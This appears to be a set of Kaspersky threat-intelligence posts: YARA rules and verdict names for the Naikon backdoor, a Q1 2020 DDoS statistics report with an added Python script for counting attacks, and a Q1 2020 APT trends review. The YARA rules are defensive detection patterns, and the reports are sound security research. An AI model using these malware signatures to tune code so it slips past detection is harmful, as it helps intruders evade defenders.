Trojan.Win32.Generic.gen
Trojan.Win32.SEPEH.gen
DangerousObject.Multi.Generic
Backdoor.Win64.Agent.h*
Backdoor.Win32.Agent.m*
Trojan-Downloader.Win32.Agent.x*

YARA Rules

rule apt_ZZ_Naikon_ARstrings : Naikon
{
    meta:
        copyright = "Kaspersky"
        description = "Rule to detect Naikon aria samples"
        hash = "2B4D3AD32C23BD492EA945EB8E59B758"
        date = "2020-05-07"
        version = "1.0"
    strings:
        $a1 = "Terminate Process [PID=%d] succeeds!" fullword wide
        $a2 = "TerminateProcess [PID=%d] Failed:%d" fullword wide
        $a3 = "Close tcp connection returns: %d!" fullword wide
        $a4 = "Delete Directory [%s] returns:%d" fullword wide
        $a5 = "Delete Directory [%s] succeeds!" fullword wide
        $a6 = "Create Directory [%s] succeeds!" fullword wide
        $a7 = "SHFileOperation [%s] returns:%d" fullword wide
        $a8 = "SHFileOperation [%s] succeeds!" fullword wide
        $a9 = "Close tcp connection succeeds!" fullword wide
        $a10 = "OpenProcess [PID=%d] Failed:%d" fullword wide
        $a11 = "ShellExecute [%s] returns:%d" fullword wide
        $a12 = "ShellExecute [%s] succeeds!" fullword wide
        $a13 = "FindFirstFile [%s] Error:%d" fullword wide
        $a14 = "Delete File [%s] succeeds!" fullword wide
        $a15 = "CreateFile [%s] Error:%d" fullword wide
        $a16 = "DebugAzManager" fullword ascii
        $a17 = "Create Directroy [%s] Failed:%d" fullword wide
        $m1 = "TCPx86.dll" fullword wide ascii
        $m2 = "aria-body" nocase wide ascii
    condition:
        uint16(0) == 0x5A4D and filesize < 450000 and (2 of ($a*) and 1 of ($m*))
}

rule apt_ZZ_Naikon_codebase : Naikon
{
    meta:
        report = "Naikon New AR Backdoor Deployment to Southeast Asia"
        description = "Naikon typo"
        author = "Kaspersky"
        copyright = "Kaspersky"
        version = "1.0"
        date = "2018-06-28"
        last_modified = "2018-06-28"
    strings:
        $a1 = "Create Directroy [%s] Failed:%d" wide
    condition:
        uint16(0) == 0x5A4D and filesize < 450000 and $a1
}

6 May 2020

DDoS attacks in Q1 2020

News overview

Since the beginning of 2020, due to the COVID-19 pandemic, life has shifted almost entirely to the Web — people worldwide are now working, studying, shopping, and having fun online like never before. This is reflected in the goals of recent DDoS attacks, with the most targeted resources in Q1 being websites of medical organizations, delivery services, and gaming and educational platforms.

For instance, attackers in mid-March tried to disable the website of the US Department of Health and Human Services (HHS). The purpose of the attack was seemingly to deprive citizens of access to official data about the pandemic and measures taken against it. At the same time, unknown cyber actors spread misinformation in social networks and via text and e-mail about the introduction of a nationwide quarantine in the US. The attempt failed: the HHS website continued to function, despite the increased load.

The victim of another DDoS attack was the large Paris-based group of hospitals Assistance Publique-Hôpitaux de Paris. Cybercriminals attempted to disable the infrastructure of medical institutions. As a result, remote hospital workers were unable to use programs and corporate e-mail for some time. However, the attackers failed to paralyze the entire organization.

The food delivery services Lieferando (Germany) and Thuisbezorgd (Netherlands) found themselves in a more awkward situation. DDoS attacks on both companies meant that although they could accept orders, they could not process them and had to return customers’ money. What’s more, the cybercriminals targeting Lieferando demanded 2 BTC (a shade over US$13,000 at the time of writing) to halt the DDoS.

The German distance-learning platform Mebis was attacked on the very first remote school day. The service, which enables teachers in the federal state of Bavaria to exchange materials, homework, and tests with schoolchildren, was down for several hours.

Online games, whose popularity has soared under quarantine, were hit repeatedly. In particular, attackers flooded the servers of Battle.net and Eve Online with junk traffic, the latter facing nine straight days of bombardment. Belarusian company Wargaming also came under fire: players of World of Tanks, World of Warships, and other titles had problems with server speeds for several days. However, skeptical users claimed that the problems had nothing at all to do with cybercriminals.

Australian authorities in late March reported a DDoS attack on the MyGov social services portal, but a couple of hours after the major announcement they were forced to admit they had made a mistake. It turned out that the site could not cope with the influx of perfectly genuine requests from citizens out of work as a result of the pandemic.

Besides DDoS attacks directly or indirectly related to the all-conquering coronavirus, this quarter saw a continuation of politically motivated attacks. In the second half of January, for instance, unknown cyber actors made two attempts to bring down the websites of government agencies and emergency services in Greece. Among the resources taken temporarily offline were the websites of the prime minister, several ministries, the fire service, and the police. The Turkish group Anka Neferler Tim claimed responsibility for the first attack, but the Greek authorities are not rushing to any final conclusions, especially since the perpetrators of the second attack have yet to announce themselves.

This year will see the next US presidential election, and the runup to it, as always, is accompanied by DDoS attacks. For example, a voter registration and information website was hit in early February. The attackers employed the PRSD (pseudorandom subdomain attack) technique to send numerous requests to non-existent subdomains of the site. However, the DDoS attempt failed: the resource was protected against attacks of this kind.

Financial institutions were not spared either. In February, the cryptocurrency exchanges OKEx and Bitfinex were subjected to sophisticated DDoS attacks. The first has assured that it handled the incident without detriment to users, while the second was forced offline for an hour. According to Bitfinex management, this was necessary to set up specialized protection. Whether the incidents were just similar or related is not known.

The BitMEX crypto exchange likewise announced a DDoS attack this quarter — not once but twice. Its access problems coincided with a sharp drop in the value of bitcoin, which prompted a wave of suspicion among customers. Some believe that the exchange intentionally went offline to prevent a mass sell-off. BitMEX later promised to pay compensation, but only to 156 users who had lost deals in the ETH/USD pair.

As in the previous quarter, ransom demands backed by DDoS threats from actors posing as well-known APT groups made the news. In late February, Australian financial institutions received e-mails demanding large sums in the cryptocurrency Monero. The attackers introduced themselves as the Silence group, and threatened DDoS attacks for non-payment. Earlier, e-mails with similar threats had been received by companies from Singapore, Turkey, South Africa, and other countries. The ransomers went by the various names of Cozy Bear, Fancy Bear, Anonymous, Carbanak, and Emotet in the hope that victims would google them and be scared into compliance.

Unlike these international ransom groups, a teenager from Odessa who last year tried to DDoS a company that had refused to cooperate was caught by police in January 2020. The youngster wanted to force a Ukrainian internet service provider to hand over information about a customer. On being refused, he attempted to disable the company’s network. The attack was reported to be quite powerful.

Overall, the past quarter was fairly rich in arrests. In February, Arthur Dam was detained in the US charged with carrying out four DDoS attacks on the website of congressional candidate Bryan Caforio in 2018, taking it offline for a total of 21 hours. The prosecution noted that Dam’s wife worked for Caforio’s rival Katie Hill, who ultimately won the vote.

Another cybercriminal was detained in Krasnodar in mid-March for attacking the online store of a company in Cherepovets, Russia. Although he had carefully masked the source of the DDoS attack, cyber police managed to trace him. The individual claimed that he had simply wanted to demonstrate his skills and offer his services to the company to defend against DDoS attacks. However, the idea failed even before his arrest, since he was unable to bring down the site.

This guy is by no means the only “double agent” in the DDoS world. In New Jersey, Tucker Preston, founder of BackConnect, a DDoS mitigation firm, admitted to a similar crime. From December 2015 to February 2016, Preston hired third parties to bombard the New Jersey-based servers of an unnamed organization with junk traffic. The offense carries up to ten years in jail and a maximum fine of US$250,000.

The owners of a website allegedly used to launch custom DDoS attacks could also be forced to fork out. Video game publisher Ubisoft filed a lawsuit against the resource after a string of attacks on the servers of Tom Clancy’s Rainbow Six Siege. According to the developer, the site — which purportedly helps clients test their own security — actually specializes in DDoSing games. Ubisoft is seeking the closure of the resource and damages from the owners.

Quarter trends

This quarter has been dominated by the coronavirus pandemic, which has shaken up many things in the world, including the DDoS market. Contrary to our forecast in the last report, in Q1 2020 we observed a significant increase in both the quantity and quality of DDoS attacks. The number of attacks doubled against the previous reporting period, and by 80% against Q1 2019. The attacks also became longer: we observed a clear rise in both the average and maximum duration. The first quarter of every year sees a certain spike in DDoS activity, but we did not expect this kind of surge.

Comparison of the total number of DDoS attacks in Q1 2020 and Q1 and Q4 2019; Q1 2019 is taken as the 100% reference value

Duration of DDoS attacks in Q1 2020 and Q1 and Q4 2019; Q1 2019 is taken as the 100% reference value (download)

Against a backdrop of overall growth, the share of smart attacks remained virtually unchanged over the past year: the first quarters of 2019 and 2020 were at the same level, around 42%. This points to a rise in interest in DDoS attacks on the part of both professionals and amateurs: the number of overall attacks is growing at the same pace as the number of smart attacks, so the proportion has not changed.

Share of smart attacks in the total number of DDoS attacks in Q1 2020 and Q1 and Q4 2019 (download)

Interestingly, the number of DDoS attacks on educational and administrative web resources tripled compared to the same period in 2019. Moreover, such attacks in Q1 2020 amounted to 19% of the total number of incidents, against just 11% a year ago.

The upswing in cybercriminal interest in such resources could be linked to the spread of COVID-19, which has created more demand for distance-learning services and official sources of information. Since the start of 2020, the pandemic has affected all industries. So it is logical for it to impact the DDoS market too. Going forward, this effect may become even more pronounced.

Although it is difficult to predict anything at a time of such global instability, it can be assumed that the attacks will not decrease: many organizations are now switching to remote working, and with that the set of viable targets is increasing. If earlier the target in most cases was companies’ public resources, now key infrastructure elements, such as corporate VPN gateways or non-public web resources (mail, corporate knowledge base, etc.), may be at risk. This is opening up new niches for attack organizers, and could lead to DDoS market growth.

Statistics Methodology

Kaspersky has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

A part of Kaspersky DDoS Protection, the DDoS Intelligence system intercepts and analyzes commands received by bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q1 2020.

In the context of this report, an incident is counted as a single DDoS attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more between activity periods, this is considered two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.
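The counting rules above, implemented as an added illustration (this is not Kaspersky's DDoS Intelligence code): activity periods of one botnet against one target are merged into a single attack while consecutive periods are less than 24 hours apart, different botnets against the same target are always separate attacks, and unique targets are counted by unique IP address. The activity records are constructed sample data; the per-day and per-weekday breakdowns are the same aggregations the report charts later.

```python
"""Attack counting under the 24-hour gap rule (added example, not Kaspersky's code)."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Tuple

# A gap of 24 hours or more between activity periods starts a new attack.
GAP_LIMIT = timedelta(hours=24)

# Constructed sample input: (botnet_id, target_ip, activity_start, activity_end).
SAMPLE_PERIODS = [
    # botnetA vs 203.0.113.10: two periods 8 h apart -> one attack ...
    ("botnetA", "203.0.113.10", datetime(2020, 2, 14, 10, 0), datetime(2020, 2, 14, 12, 0)),
    ("botnetA", "203.0.113.10", datetime(2020, 2, 14, 20, 0), datetime(2020, 2, 14, 22, 0)),
    # ... then a period 35 h after the previous one -> a second attack
    ("botnetA", "203.0.113.10", datetime(2020, 2, 16, 9, 0), datetime(2020, 2, 16, 10, 0)),
    # botnetB hitting the same target at the same time -> counted separately
    ("botnetB", "203.0.113.10", datetime(2020, 2, 14, 11, 0), datetime(2020, 2, 14, 13, 0)),
    # botnetA against a second target
    ("botnetA", "198.51.100.7", datetime(2020, 2, 15, 0, 0), datetime(2020, 2, 15, 1, 0)),
]

Period = Tuple[str, str, datetime, datetime]
Attack = Tuple[str, str, datetime, datetime]  # (botnet, target, first_start, last_end)


def group_attacks(periods: Iterable[Period]) -> List[Attack]:
    """Merge activity periods into attacks per (botnet, target) pair."""
    by_pair: Dict[Tuple[str, str], List[Tuple[datetime, datetime]]] = defaultdict(list)
    for botnet, target, start, end in periods:
        by_pair[(botnet, target)].append((start, end))

    attacks: List[Attack] = []
    for (botnet, target), spans in by_pair.items():
        spans.sort()  # chronological order by start time
        cur_start, cur_end = spans[0]
        for start, end in spans[1:]:
            if start - cur_end >= GAP_LIMIT:
                # Quiet for 24 h or more: close the current attack, open a new one.
                attacks.append((botnet, target, cur_start, cur_end))
                cur_start, cur_end = start, end
            else:
                # Still the same attack; extend its end if this period runs later.
                cur_end = max(cur_end, end)
        attacks.append((botnet, target, cur_start, cur_end))
    # Deterministic order: by start time, then botnet, then target.
    return sorted(attacks, key=lambda a: (a[2], a[0], a[1]))


def count_unique_targets(attacks: Iterable[Attack]) -> int:
    """Unique targets are counted by unique victim IP address."""
    return len({target for _, target, _, _ in attacks})


def attacks_per_day(attacks: Iterable[Attack]) -> Dict[str, int]:
    """Number of attacks by the calendar day (ISO date) on which they began."""
    counts: Dict[str, int] = defaultdict(int)
    for _, _, start, _ in attacks:
        counts[start.date().isoformat()] += 1
    return dict(counts)


def share_by_weekday(attacks: Iterable[Attack]) -> Dict[str, float]:
    """Percentage of attacks starting on each weekday (English day names)."""
    attacks = list(attacks)
    counts: Dict[str, int] = defaultdict(int)
    for _, _, start, _ in attacks:
        counts[start.strftime("%A")] += 1
    total = len(attacks)
    return {day: round(100.0 * n / total, 2) for day, n in counts.items()}


if __name__ == "__main__":
    found = group_attacks(SAMPLE_PERIODS)
    print(len(found), "attacks against", count_unique_targets(found), "unique targets")
    print(attacks_per_day(found))
    print(share_by_weekday(found))
```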

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary

  • In Q1 2020, most C&C servers were still registered in the US (39.93%), while most bots were in Brazil.
  • In terms of the dynamics of the number of attacks overall, this quarter was very similar to the last — with peaks of more than 230 attacks on February 14 and 15 and a drop to 16 attacks on January 25.
  • DDoS attackers were most active on Mondays, and more likely to rest on Wednesdays.
  • SYN flooding is still the most popular type of attack (and even strengthened its position with 92.6% of all attacks), while ICMP attacks unexpectedly jumped ahead of all other varieties into second place.
  • Windows botnets continue to gain popularity: the share of attacks using them grew by 3 p.p. to 5.64%.

Geography of unique IP addresses used in attacks

This quarter, we decided to look at the distribution by country of botnets and their component bots. To do so, we analyzed the location of the unique IP addresses from which attacks on our honeypots were registered.

First place in the TOP 10 countries by number of bots goes to Brazil, with 12.25% of unique IP addresses. In second place, less than one percentage point behind, is China (11.51%), while third position — by a much wider margin — is taken by Egypt (7.87%). The remaining TOP 10 countries scored from 6.5% to 2.5% of the total number of bot IP addresses. The rating also featured several Asian countries (Vietnam (6.41%) in fourth; Taiwan (3.96%) in seventh; India (3.65%) in eighth), plus Iran (5.56%) in fifth place, Russia (4.65%) in sixth, and the US (3.56%) in ninth. The TOP 10 is rounded out by Turkey, the source of 2.86% of unique addresses used for attacks.

Distribution of botnets by country, Q1 2020 (download)

Curiously, this distribution only partially correlates with the attack statistics. Whereas China has long occupied top spot in the ranking by number of attacks, and Vietnam is a regular visitor to the TOP 10, the leader of the rating by number of unique IPs, Brazil, has only been in the TOP 20 once this past year, taking 20th position in Q1 2019. More often than not, it appears only in the bottom third of the TOP 30, not unlike Iran, which closes off the TOP 5 by number of bots. As for Egypt (3rd place by number of bots), it is the source of very few registered attacks, so it generally lies outside even the TOP 30.

Botnet distribution geography

If individual attack devices are mainly located in South America, Asia, and the Middle East, C&C servers, as in the previous quarter, are more often registered in the US and Europe. First place by number of C&Cs is retained by the US, where in Q1 2020 almost 40% of the total were registered (down 18.5 p.p. against the end of last year). Second place is occupied by the Netherlands (10.07%), which climbed up from eighth, and third goes to Germany (9.55%), which last quarter was nowhere to be seen in the TOP 10. As we saw above, of the TOP 3 countries by number of C&C servers, only the US hosted a significant number of bots.

Fourth position by number of C&Cs went to another European country, this time France (8.51%), climbing two rungs up the ladder. China showed the exact opposite trend, falling from third to fifth (3.99% vs 9.52% in Q4 2019). Canada (2.95%) took sixth place, up from ninth, while seventh position was shared by Russia, Romania (back in the TOP 10 after a quarterly break), and newcomer Croatia. Each of these countries scored 2.43% of the total number of C&C servers. The TOP 10 is rounded out by another newcomer, Singapore, on 2.08%.

Distribution of botnet C&C servers by country, Q1 2020 (download)

Dynamics of the number of DDoS attacks

The dynamics of the number of attacks in Q1 2020 are in many ways similar to what we saw at the end of 2019. The peak indicators did not exceed 250 attacks per day (the hottest were February 14 and 15, that is, on and just after St Valentine’s Day (242 and 232 attacks, respectively), as well as the 3rd and 10th of that same month). The calmest days of the quarter were January 25 and March 18, when the number of attacks fell short of 20 a day (recall that the quietest day of Q4 2019 saw only 8 registered attacks).

Dynamics of the number of DDoS attacks in Q1 2020 (download)

In the past quarter, the number of attacks on Mondays increased significantly — by almost 4 p.p. If in the previous reporting period this day accounted for only about 14% of attacks, it now commands close to 18%. The calmest day of the quarter was Wednesday (a fraction over 11% of attacks, down 3.7 p.p. on the previous quarter), lagging only slightly behind (by 1.5 p.p.) the previous rating’s anti-leader in terms of attack intensity, Thursday.

Distribution of DDoS attacks by day of the week, Q4 2019 and Q1 2020 (download)

Types of DDoS attacks

The past quarter has seen some noticeable changes in the distribution of DDoS attacks by type: ICMP flooding added 2 p.p. and confidently moved from last to second place (3.6% against 1.6% in the previous reporting period). Accordingly, HTTP flooding finished bottom with its lowest score since January 2019 (a mere 0.3%). UDP and TCP flooding once again swapped places. The only non-mover was the top-placed SYN flooding, whose share continued to grow and reached a record high of 92.6% for the observation period (beating the previous record of 84.6% set last quarter).

Distribution of DDoS attacks by type, Q1 2020 (download)

Windows botnets are becoming more popular. If in the last reporting period they snatched just 0.35 p.p. from their Linux cousins, this time they took a 3 p.p. slice (up from 2.6% to 5.64% of attacks). That said, they are still far from being a serious competitor: 9 out of 10 attacks continue to deploy Linux botnets (94.36%).

Ratio of Windows/Linux botnet attacks, Q4 2019 and Q1 2020 (download)

Conclusion

Q1 2020 did not bring any major shocks. The TOP 10 countries by number of C&C servers welcomed two new entries (Croatia and Singapore) and saw the return of two familiar faces (Romania and Germany). Although we observed some growth in Windows botnets and ICMP floods, this did not significantly affect the overall picture. Only the distribution of attacks by day of the week changed substantially, but even that points only to a redistribution of efforts, not a quantitative shift. The rise in the number of DDoS attacks on St Valentine’s Day followed by a lull was also a predictable seasonal phenomenon.

April 30, 2020

APT trends report Q1 2020

For more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2020.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact ‘intelreports@kaspersky.com’.

Given the exceptional situation the world is living in because of the COVID-19 pandemic, we must start with a summary of how APT groups have been abusing this topic for different types of attacks.

COVID-19 APT activity

Since the World Health Organization (WHO) declared COVID-19 a pandemic, this topic has received increased attention from different attackers. Many of the phishing scams we’ve seen have been launched by cybercriminals trying to cash in on people’s fears about the virus. However, the list of attackers also includes APT threat actors such as Kimsuky, APT27, Lazarus or ViciousPanda who, according to OSINT, have used COVID-19-themed lures to target their victims. We recently discovered a suspicious infrastructure that could have been used to target health and humanitarian organizations, including the WHO. Even though the infrastructure cannot be attributed to any particular actor at the moment, and was registered before the COVID-19 crisis, in June 2019, according to some private sources it might be related to the DarkHotel actor. However, we cannot confirm this information at the moment. Interestingly, some groups have used the current situation to try to soften their reputation by declaring that they would not target health organizations during the crisis.

There are different publications reporting activity related to other APT actors using this lure, but in general, we do not believe this implies a meaningful change in terms of TTPs other than using a trendy topic for luring victims. We are closely monitoring the situation.

The most remarkable findings

In January 2020, we discovered a watering hole utilizing a full remote iOS exploit chain. This site appears to have been designed to target users in Hong Kong, based on the content of the landing page. While the exploits currently being used are known, the actor responsible is actively modifying the exploit kit to target more iOS versions and devices. We observed the latest modifications on February 7. The project is broader than we initially thought, supporting an Android implant, and probably supporting implants for Windows, Linux, and macOS. For the time being, we are calling this APT group TwoSail Junk. We believe this is a Chinese-speaking group; it maintains infrastructure mostly within Hong Kong, along with a couple of hosts located in Singapore and Shanghai. TwoSail Junk directs visitors to its exploit site by posting links within the threads of forum discussions, or creating new topic threads of their own. To date, dozens of visits were recorded from within Hong Kong, with a couple from Macau. The technical details around the functionality of the iOS implant, called LightSpy, and related infrastructure, reveal a low-to-mid capable actor. However, the iOS implant is a modular and exhaustively functional iOS surveillance framework.

Russian-speaking activity

In January, a couple of recently compiled SPLM/XAgent modules were detected in an Eastern European telecoms company. The initial point of entry is unknown, as is their lateral movement within this organization. It has become rare to identify SPLM infections, compared to past levels of Sofacy activity, so it seems that portions of this network may have been infected for some time. In addition to these SPLM modules, Sofacy also deployed .NET XTUNNEL variants and their loaders. These 20KB XTUNNEL samples themselves seem minimal in comparison to past XTUNNEL samples, which weighed in at 1-2MB. This shift to C# by the long-standing Sofacy XTunnel codebase reminds us of Zebrocy’s practice of re-coding and innovating long-used modules in multiple languages.

Gamaredon, a well-known APT group that has been active since at least 2013, has traditionally focused on Ukrainian entities. In recent months we have observed a campaign, made up of different waves, that has also been reported by multiple researchers on different social networks. The attackers sent malicious documents with remote template injection, resulting in a multi-level infection scheme to deploy a malicious loader that periodically contacts a remote C2 to download additional samples. Based on past research, we know that the Gamaredon’s toolkit includes many different malware artefacts, developed to achieve different goals. These include scanning drives for specific system files, capturing screenshots, executing remote commands, downloading additional files and managing the remote machine with programs such as UltraVNC. In this case, we observed an interesting new second stage payload that includes spreading capabilities, that we call “Aversome infector”. This malware seems to have been developed to maintain a strong persistence in the target network and to move laterally by infecting Microsoft Word and Excel documents on external drives.

Chinese-speaking activity

CactusPete is a Chinese-speaking cyber-espionage group active since at least 2012 characterized by medium-level technical capabilities. Historically, this threat actor has targeted organizations within a limited range of countries – South Korea, Japan, the US and Taiwan. At the end of 2019 the group seemed to shift towards a heavier focus on Mongolian and Russian organizations. CactusPete offensive activity against the Russian defense industry and Mongolian government appears to be mostly delineated from its Russian-Mongolian commercial and border relationships. However, one bait exploit document dropping its Flapjack backdoor (tmplogon.exe, primarily focused on new Russian targets) is authored in Mongolian. The group’s broadening of techniques, exploit re-purposing, targeting shift and possible expansion suggests changes in the group’s resources and operations.

Rancor is a group that has been publicly reported since 2018, with connections to DragonOK. This actor traditionally had a focus on Southeast Asian targets, namely Cambodia, Vietnam and Singapore. We noted several updates to the group’s activity in the last few months, namely the discovery of a new variant of the Dudell malware that we are calling ExDudell, a new tool for bypassing UAC (User Account Control), and new infrastructure utilized in the attacks. Apart from this, we have also identified that the initial lure documents that were previously sent via mail are now found in the Telegram Desktop directory, suggesting the group is possibly making a shift in its initial delivery method.

In 2019, we detected activity by an unknown actor at the time deploying watering holes on websites representing Tibetan interests, fooling victims into installing fake Adobe Flash updates hosted on a GitHub repository. Kaspersky thwarted the attack by coordinating a takedown of this repository with GitHub. After a brief period of inactivity, we detected a new round of watering holes featuring a renewed toolset. We decided to call the group behind this activity Holy Water.

The threat actor’s unsophisticated but creative toolset has been evolving a lot since its inception, may still be in development, and leverages Sojson obfuscation, the NSIS installer, Python, open-source code, GitHub distribution, the Go language, as well as Google Drive-based C2 channels.

Middle East

We recently detected a new, ongoing data exfiltration campaign targeting victims in Turkey that started in February 2020. While StrongPity’s TTPs in terms of targeting, infrastructure and infection vector haven’t changed, we observed a somewhat peculiar change in the documents they attempt to exfiltrate. In this campaign, StrongPity updated its latest signature backdoor, named StrongPity2, and added more files to exfiltrate to its list of common Office and PDF documents, including Dagesh Pro Word Processor files used for Hebrew dotting, RiverCAD files used for river flow and bridge modelling, plain-text files, archives as well as GPG encrypted files and PGP keys.

In March, we discovered a targeted campaign to distribute Milum, a Trojan designed to gain remote control of devices in target organizations, some of which operate in the industrial sector. The first signs of this operation, which we have dubbed WildPressure, can be traced back to August 2019; still, the campaign remains active. The Milum samples we have seen so far do not share any code similarities with any known APT campaigns. The malware provides attackers with remote control over infected devices, allows downloading and executing commands, collecting and exfiltrating information and installing upgrades in the malware.

In late December 2019, Kaspersky Threat Attribution Engine detected a new variant of the Zerocleare wiper that had possibly been used in targeted attacks on energy sector targets in Saudi Arabia. This quarter, we identified a new variant of this wiper, called Dustman. It is similar to Zerocleare in terms of wiping and distribution, but changes in variables and technical names suggest this might have been in readiness for a new wave of attacks specifically targeting Saudi Arabia’s energy sector, based on messages embedded in the malware and the mutex created by it. The PDB file of the Dustman wiper suggested that this destructive code was the release edition and was ready for deployment in a target network. These changes coincided with the New Year holidays, during which many employees take time off to celebrate. Shamoon was delivered with similar timing in 2012 during Ramadan celebrations.

Southeast Asia and Korean Peninsula

A Lazarus campaign outlined by the Italian security company Telsy in November 2019 allowed us to find a connection to previous activity from the group targeting cryptocurrency businesses. The malware mentioned on Telsy’s blog is a first stage downloader that has been observed since mid-2018. We found that the second stage malware is a variant of Manuscrypt, uniquely attributed to Lazarus, deploying two types of payloads. The first is a manipulated Ultra VNC program, and the second is a multi-stage backdoor. This type of multi-stage infection procedure is typical of the Lazarus group’s malware, especially when using the Manuscrypt variant. In this campaign, our telemetry indicates that the Lazarus group attacked cryptocurrency businesses in Cyprus, the US, Taiwan and Hong Kong, and the campaign extended until the beginning of 2020.

Kimsuky, an actor we have been tracking since 2013, was especially active during 2019. In December, Microsoft took down 50 domains used by the group and filed a lawsuit against the attackers in a Virginia court. However, the group has continued its activity without significant changes. We recently discovered a new campaign where the actor used a decoy image themed around New Year’s greetings that delivers its old downloader with a new evolved next-stage payload designed to steal information that uses a new encryption method.

At the end of January, we stumbled upon a malicious script exploiting an Internet Explorer vulnerability, CVE-2019-1367. After closely examining the payload and finding connections with previous activity, we concluded that DarkHotel was behind this campaign, probably in progress since 2018. The campaign saw DarkHotel utilize a multi-stage binary infection phase using home-brewed malware. The initial infection creates a downloader which fetches another downloader to collect system information and fetch the final backdoor only for high-value victims. DarkHotel used a unique combination of TTPs in this campaign. The threat actor used diverse infrastructure to host malware and to control infected victims, including a compromised web server, a commercial hosting service, a free hosting service and a free source code tracking system. We were able to confirm targeted companies in South Korea and Japan in this campaign.

In March, researchers from Google revealed that a group of hackers used five zero-days to target North Koreans and North Korean-focused professionals in 2019. The group exploited flaws in Internet Explorer, Chrome, and Windows with phishing emails that carried malicious attachments or links to malicious sites, as well as watering-hole attacks. We were able to match two of the vulnerabilities – one in IE and one in Windows – to DarkHotel.

FunnyDream is a campaign that started in mid-2018, targeting high-profile entities in Malaysia, Taiwan and the Philippines, with the majority of victims in Vietnam. Our analysis revealed that it’s part of a wider campaign that stretches back a few years and targets governments, and specifically foreign organizations, of countries in Southeast Asia. The attacker’s backdoor downloads and uploads files from/to a C2, executes commands and runs new processes on the victim machine. It also collects information about other hosts on the network and is delivered to new hosts through remote execution utilities. The attacker also used an RTL backdoor and the Chinoxy backdoor. The C2 infrastructure has been active since mid-2018 and domains show an overlap with the FFRAT malware family. In a number of cases, indications suggest the backdoor was delivered via a previous long-term compromise. The campaign is still active.

Operation AppleJeus was one of the more notable campaigns of Lazarus, and the first time the actor targeted macOS targets. Our January follow-up research revealed significant changes to the group’s attack methodology: homemade macOS malware and an authentication mechanism to carefully deliver the next-stage payload, as well as loading the next-stage payload without touching the disk. To attack Windows victims, the group has elaborated a multi-stage infection procedure and significantly changed the final payload. We believe that Lazarus has been more careful in its attacks since the release of Operation AppleJeus and has employed a number of methods to avoid detection. We identified several victims in the UK, Poland, Russia and China. Moreover, we were able to confirm that several of the victims are linked to cryptocurrency organizations.

Roaming Mantis is a financially motivated actor first reported in 2017, when it used SMS to distribute its malware to Android devices based in South Korea. Since then, the scope of the group’s activities has widened considerably, supporting 27 languages, targeting iOS as well as Android, and even mining cryptocurrency. The actor also added new malware families, including Fakecop and Wroba.j to its arsenal, and is still active using ‘SMiShing‘ for Android malware distribution. In a recent campaign it distributed malicious APKs masquerading as popular couriers and customized for the targeted countries, including Japan, Taiwan, South Korea and Russia.

Other interesting discoveries

Transparent Tribe started using a new module named USBWorm at the beginning of 2019, as well as improving its custom .NET tool named CrimsonRAT. Based on our telemetry, USBWorm was used to infect thousands of victims, most of them located in Afghanistan and India, providing the attacker with the ability to download and execute arbitrary files, spread to removable devices and steal files of interest from infected hosts, even those disconnected from the internet. As we previously reported, this group mainly focuses on military targets, which are usually compromised with Office documents armed with malicious VBA and open-source malware like Peppy RAT and CrimsonRAT. In its new campaign, which is still active, we noticed the group’s focus shift more towards targeting entities located in Afghanistan in addition to India. Transparent Tribe has also developed a new implant designed to infect Android devices, a modified version of the AhMyth Android RAT, which is open-source malware available on GitHub.

During the last months of 2019, we observed an ongoing campaign conducted by Fishing Elephant. The group continues to use both Heroku and Dropbox in order to deliver its tool of choice, AresRAT. We discovered that the actor incorporated a new technique into its operations that is meant to hinder manual and automatic analysis – geo-fencing and hiding executables within certificate files. During our research, we also detected a change in victimology that may reflect the current interests of the threat actor: the group is targeting government and diplomatic entities in Turkey, Pakistan, Bangladesh, Ukraine and China.

Final thoughts

While the threat landscape isn’t always full of “groundbreaking” events, when we cast our eyes back over the activities of APT threat actors, there are always interesting developments. Our regular quarterly reviews are intended to highlight the key developments.

These are some of the main trends that we’ve seen this year so far.

All in all, we see the continuous growth of activity in Asia and how some of the actors we called newcomers are now well established. On the other hand, the more traditional advanced actors seem to be more and more selective in their operations, probably following a change of paradigm. The use of mobile platforms for infections and the distribution of malware is on the rise. Every actor seems to have some artefacts for these platforms and in some campaigns they are the main target.

COVID-19 is clearly top of everyone’s minds at the moment and APT threat actors have also been seeking to exploit this topic in spear-phishing campaigns. We do not believe this represents a meaningful change in terms of TTPs: they’re simply using it as a newsworthy topic to lure their victims. However, we are closely monitoring the situation.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.